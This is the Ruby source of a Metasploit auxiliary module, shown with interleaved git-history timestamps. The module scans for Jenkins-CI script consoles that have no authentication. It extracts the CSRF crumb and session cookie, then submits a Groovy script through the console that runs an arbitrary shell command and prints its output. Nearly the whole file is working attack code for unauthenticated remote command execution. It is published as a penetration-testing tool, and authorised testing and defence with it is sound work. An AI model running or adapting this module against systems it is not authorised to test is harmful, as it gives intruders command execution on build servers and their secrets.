metasploit-framework/modules/auxiliary/scanner/http/jenkins_command.rb

144 lines
4.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
2015-09-04 23:56:44 +00:00
require 'cgi'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins-CI Unauthenticated Script-Console Scanner',
'Description' => %q{
2015-09-04 23:56:44 +00:00
This module scans for unauthenticated Jenkins-CI script consoles and
executes the specified command.
},
2015-09-03 03:50:03 +00:00
'Author' =>
[
2016-01-22 17:27:26 +00:00
'altonjx',
'Jeffrey Cap'
2015-09-03 03:50:03 +00:00
],
2016-01-22 17:27:26 +00:00
'References' =>
[
['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/'],
['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'],
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ]),
OptString.new('COMMAND', [ true, 'Command to run in application', 'whoami' ]),
], self.class)
end
2015-09-03 18:12:07 +00:00
def fingerprint_os(ip)
2016-01-22 17:27:26 +00:00
res = send_request_cgi({'uri' => normalize_uri(target_uri.path,"systemInfo")})
2015-09-04 23:56:44 +00:00
# Verify that we received a proper systemInfo response
unless res && res.body.to_s.length > 0
vprint_error("#{peer} - The server did not reply to our systemInfo request")
return
2015-09-04 23:56:44 +00:00
end
unless res.body.index("System Properties") &&
res.body.index("Environment Variables")
if res.body.index('Remember me on this computer')
vprint_error("#{peer} This Jenkins-CI system requires authentication")
2015-09-03 18:12:07 +00:00
else
2015-09-04 23:56:44 +00:00
vprint_error("#{peer} This system is not running Jenkins-CI at #{datastore['TARGETURI']}")
2015-09-03 18:12:07 +00:00
end
2015-09-04 23:56:44 +00:00
return
2015-09-03 18:12:07 +00:00
end
2015-09-04 23:56:44 +00:00
host_info = {}
if (res.body =~ /"\.crumb", "([a-z0-9]*)"/)
print_status("#{peer} Using CSRF token: '#{$1}'")
host_info[:crumb] = $1
sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
host_info[:cookie] = "#{sessionid}"
end
2015-09-04 23:56:44 +00:00
os_info = pattern_extract(/os.name(.*?)os.version/m, res.body).first
host_info[:prefix] = os_info.index(">Windows") ? "cmd.exe /c " : ""
host_info
2015-09-03 18:12:07 +00:00
end
def run_host(ip)
command = datastore['COMMAND'].gsub("\\", "\\\\\\")
2015-09-04 23:56:44 +00:00
host_info = fingerprint_os(ip)
return if host_info.nil?
prefix = host_info[:prefix]
2015-09-04 23:56:44 +00:00
request_parameters = {
2016-01-22 17:27:26 +00:00
'uri' => normalize_uri(target_uri.path,"script"),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' =>
{
'script' => "def sout = new StringBuffer(), serr = new StringBuffer()\r\ndef proc = '#{prefix} #{command}'.execute()\r\nproc.consumeProcessOutput(sout, serr)\r\nproc.waitForOrKill(1000)\r\nprintln \"out> $sout err> $serr\"\r\n",
'Submit' => 'Run'
}
}
request_parameters['cookie'] = host_info[:cookie] unless host_info[:cookie].nil?
request_parameters['vars_post']['.crumb'] = host_info[:crumb] unless host_info[:crumb].nil?
res = send_request_cgi(request_parameters)
2015-09-04 23:56:44 +00:00
unless res && res.body.to_s.length > 0
vprint_error("#{peer} No response received from the server.")
return
end
plugin_output, command_output = pattern_extract(/<pre>(.*?)<\/pre>/m, res.body.to_s)
if plugin_output !~ /Jenkins\.instance\.pluginManager\.plugins/
vprint_error("#{peer} The server returned an invalid response.")
return
end
# The output is double-HTML encoded
output = CGI.unescapeHTML(CGI.unescapeHTML(command_output.to_s)).
gsub(/\s*(out|err)>\s*/m, '').
strip
if output =~ /^java\.[a-zA-Z\.]+\:\s*([^\n]+)\n/
output = $1
print_good("#{peer} The server is vulnerable, but the command failed: #{output}")
2015-09-03 03:50:03 +00:00
else
2015-09-04 23:56:44 +00:00
output.split("\n").each do |line|
print_good("#{peer} #{line.strip}")
2015-09-03 03:50:03 +00:00
end
end
2015-09-04 23:56:44 +00:00
report_vulnerable(output)
end
def pattern_extract(pattern, buffer)
buffer.to_s.scan(pattern).map{ |m| m.first }
2015-09-03 03:50:03 +00:00
end
2015-09-04 23:56:44 +00:00
def report_vulnerable(result)
report_vuln(
:host => rhost,
:port => rport,
2015-09-03 03:50:03 +00:00
:proto => 'tcp',
2015-09-04 23:56:44 +00:00
:sname => ssl ? 'https' : 'http',
:name => self.name,
:info => result,
:refs => self.references,
:exploited_at => Time.now.utc
2015-09-03 03:50:03 +00:00
)
end
end